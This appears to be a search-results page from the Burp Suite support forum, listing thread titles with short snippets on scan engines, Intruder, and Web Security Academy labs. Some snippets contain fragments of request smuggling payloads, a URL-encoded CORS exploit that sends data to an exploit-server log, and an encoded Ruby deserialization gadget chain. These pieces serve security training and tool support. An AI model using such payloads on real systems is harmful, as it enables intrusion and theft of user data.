PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request … https://0ad70019033a57a1c05c334c004d0082.web-security-academy.net/login Content-Type: application/x-www-form-urlencoded … is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1</p> </div> </section

Scanning abandoned due to too many errors

You can do this via Scanner > Options > Active Scanning Engine.

use burp suite

https://www.?elp.com

Possible bug in concrete class of IScanQueueItem

Unfortunately, I do not control the reflection query since it is managed by the JFX web engine.

Burp 2.x Audit finds less issues

Hi, the scanning engine has changed completely from version 1 -> 2, we navigate through the application

Burp scanner ignores scan configuration exclusion lists

/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1 Host: www..... … Connection: close Content-Length: 3002 X-Single-Page-Navigation: true Origin: https://www.....

An incorrect example in the "Exploiting HTTP request smuggling" section on the Web Security Academy.

Transfer-Encoding: chunked 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded … supposed to be: 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

How do I troubleshoot "failed to connect" messages?

before retry" when a network error occurs: http://portswigger.net/burp/help/spider_options.html#engine … http://portswigger.net/burp/help/scanner_options.html#engine

XSS vulnerabilites

From your response, Can you please confirm if scanning engine is intelligent enough to modify its requests

Embedded browser fails to start from docker container

https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities --cap-add=SYS_ADMIN

IIS 7.5 crashes when actively scanning website

Dafydd, are you talking about number of threads in the Active Scanning Engine area should I use Throttle

Yes, you can reduce the thread count in the active scanning engine options, as the first fix.

upgrade since I was waiting on the upgrade I want to try the scanner options In the Active Scanning Engine

Burp Search Function does not show original and edited Request

When using Burp's search functionality, the results only contain a request and response pair for each

Broken chunked-encoding

like Gecko) Chrome/88.0.4324.150 Safari/537.36 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded … keep-alive 96 GET /404 HTTP/1.1 X: x=1&q=smugging&x= Host: example.com Content-Type: application/x-www-form-urlencoded

In proxy history, view both request and response in the same tab

did we got response search feature ? are we get it ever?

Possible bug: Missing hosts in site map in branch 2.x

It may be that task execution engine was paused. You will see a warning in the Dashboard tab if so.

Hi Liam, My burp was still open and task execution engine was indeed paused!

Solution not functional: "Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses"

HTTP/1.1 Host: 0a4c00f10450f67f802cd1480095009f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP Request Smuggler doesn't work

HTTP Request Smuggler is not working properly, when I start Attack, it does not proceed from "ENGINE

Hi Frame Are you seeing the same problem with the attack not proceeding from 'Engine warming up'?

Hello, I don't see any errors related to 'Engine warming up'.

Random timing for intruder

You can configure this at Intruder > Options > Request Engine > Throttle > Variable.

Turbo Intruder ( Import error of a python library - requests module )

you know you can use callbacks.makeHttpRequest to issue requests outside of the configured request engine

Lab: HTTP request smuggling, basic TE.CL vulnerability

document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded … postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0

postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 … postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0

Resource Pools

scroll down to the bottom, there's the option to adjust the number of threads in use by the Discovery Engine

Burp 2 active scanner paused

We're working on a few bug fixes in the Task Execution Engine, which manages scans.

How lookup for specific list of parameter in search functionality in burpsuit.

Hi Team, I did find is this feature available or not? If suppose, I have list of parameters if I want to use that list in order to look for parameter or existence in burp history. is that possible? I will just load...

Burp Enterprise vs Burp pro

Does Burp pro use a newer engine than Burp Enterprise? Fabio

Cannot set spider link depth to zero.

The underlying engine is working correctly. We'll get this fixed shortly.

Lab: CORS vulnerability with trusted insecure protocols - exploit works in my browser (Chrome) but not when deliver to vitim

71%2e%6f%6e%6c%6f%61%64%20%3d%20%72%65%71%4c%69%73%74%65%6e%65%72%3b%20%72%65%71%2e%6f%70%65%6e%28%27%67% … 64%38%36%33%30%31%65%36%30%30%31%35%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%

Burpsuite Enterprise: Crawling and scoping

Burp Pro and Enterprise use the same crawl and scan engine.

between Burp Pro and Enterprise is because Burp 1's spider function works differently to the crawl engine

Turbo Intruder: always updating Content-Length header

Here is my script: def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint … pipeline=True, maxRetriesPerRequest=0, engine

Lab: Exploiting HTTP request smuggling to capture other users' requests

HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked Content-Length: 251 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Burp Enterprise Questions

Since pro and enterprise version using same scan engine, May I know the additional benefit or feature

Burp stops accepting keyboard input in repeater request window

java.runtime.name OpenJDK Runtime Environment java.runtime.version 16.0.2+7-67 … 16 java.vm.vendor Oracle Corporation java.vm.version 16.0.2+7-67

Mystery Challenge

The lab randomization engine is not working properly.

Difference in burpsuite dastardly and pro light scan results

My question is if dastardly uses the same lightweight engine as burpsuite then how the results are different

Delay Intruder attack

This was removed when we carried out some work on Intruder to move it over to using the standard Task Engine

How do i disable default scanner?

The default scanner engine sends a lot of requests, can i disable it and only use my scanner extension

Burp Infiltrator JCR injection

69) at org.apache.jackrabbit.core.query.CompoundQueryFactory.createQuery(CompoundQueryFactory.java:67

Crawler throttle options

Hello, The old spider engine has throttle between requests options but I cannot find them with the

Changing color of filter "button" in Proxy/HTTP History when using "Search Term"

changing the color of the "Filter" button within the Proxy/HTTP window, or elsewhere also, when a "Search

Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Is the victim user configured to search and click on anchor tags only?

Burp Enterprise - Scan Multi Step Login to Application

Burp Enterprise uses the same Crawling and Scanning engine. Unfortunately, we can't provide an ETA.

Incorrect Issue Type/Advisory Finding & Remediation

As such, it is recommended to set the header as X-XSS-Protection: 0" Reference https://owasp.org/www-project-secure-headers

Add HTTP Method as a value to the filter scope

Btw, I had a look at how your extension works: you tricked the engine into believing it's a response

turbo intruder

Hi Could you clarify which engine you are using with Turbo Intruder?

Accuracy of Scan between Professional and Enterprise

The scan engine is the same in both Enterprise and Professional.

more flexible scanning

We do have a work plan for a more advanced execution engine, which will feature what you mentioned and

Hybrid environment

Where the console is installed on-prem but wants a scan engine installed in Azure AD.

Burp Collaborator question

Now we all know that the active engine scanner issues payloads containing Burp collaborator's hosts. … vulnerability by not being able to keep all interactions generated by the collaborator in the active scan engine

Projects randomly stop collecting target information.

Additionally, I've sent you an email displaying the task execution engine paused message.

How can i send two same request parallelly at the exact same milisecond?

What settings have you set for the Request Engine in Intruder?

Proxy connection closed

7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84 Connection: close Content-Type: application/x-www-form-urlencoded

BCheck SQLi bypass autentication

: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded … : 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded

Burp plugin that does not launch Burp GUI

specify this on the command line, for example: java -Djava.awt.headless=true -jar burp.jar Burp's engine

Scan errors in Burp

retries Burp will perform and how long it will wait before retries at Scanner / Options / Active Scanning Engine

Where is the firefox "plug-n-hack" plugin?????

And, further, nothing works with Firefox 67, because it changes every URL to https

Ignore 302's in "Discover content" tool

needed, as I'm increasingly encountering sites where the current behaviour makes the content discovery engine

Schedule task

am trying to schedule an HTTP request using Engagement tools > Schedule task > Resume task execution engine

Using Burp Intruder threads option

Hi Dean, The Intruder has now been integrated with the Task Execution Engine so you will need to use

HTTP request Smuggling CL.TE LAB

HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded

solution : POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Lab: HTTP request smuggling, basic CL.TE vulnerability

HTTP/1.1 Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Advanced Target Scope - Load File

.*\.example\.com\/* test\.net\/path\/here\/* www\.test\.net\/* -----------

Burp Collaborator WAF triggering/not obeying options

I had presumed that the collaborator was part of the core engine.

Burp intruder

If Intruder was controlled by the Task Engine, so it would be included in the Project Options -> Scheduled

Exploiting Ruby deserialization using a documented gadget chain

57%5a%70%59%32%46%30%61%57%39%75%42%6a%6f%52%51%47%78%76%59%57%52%6c%5a%46%39%6d%63%6d%39%74%53%53%49%67% … %32%4e%68%63%6d%78%76%63%79%39%74%62%33%4a%68%62%47%55%75%64%48%68%30%42%6a%6f%47%52%56%52%76%4f%77%67%

Burp Scaner with form credentials

The Content-Type is: application/x-www-form-urlencoded

How do i can use SiteMap and Macros from Professional in Enterprise version

We are working on enhancements to Burp's crawl engine that will ensure that it deals with JavaScript-heavy

spider authentication error

This is in Spider > Options > Spider Engine.

The paging file is too small for this operation to complete

I have a dedicated scan engine and am only running 5 concurrent scans at a time.

Feature request regarding Burp's "Turbo Intruder" extension.

With this configuration: def queueRequests(target, wordlists): engine = RequestEngine(endpoint

Timing requests

Intruder attacks are registered as tasks so they are included when you pause or resume the Task Execution Engine

Can't install my certificates on http://burp

Search for browser.fixup.alternate.suffix. You can modify the .com default setting.

Filtering Intruder results using Regex

The search filter on Intruder results looks in the full response, headers and body.

Exploit Server

When I search vulnerability on www.example.com what should I use intead of "Portswigger>exploit-server

Old scanning workflow

My one request would be to have the option to have an old scanning engine view :) E.g List of URLs

Embeded Browser

Or is there a way to use Dom Intruder in another engine like Firefox or chrome. thank you

Good XSS detection

Please do have at least the level of accuracy as a regular nessus engine does when it comes to web testing

Corrupted Project

alias traversal, retire.js, software vulnerability scanner, software version reporter - the task engine

Turbo Intruder Headless Error

You will need to change your Engine type to one of the standalone non-Burp network stacks.

Section Symbols are appearing in images which breaks Intruder

literally anything, for example this random picture from google image search for "cats" https://images.pexels.com

Lab: CSRF where token is not tied to user session

https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded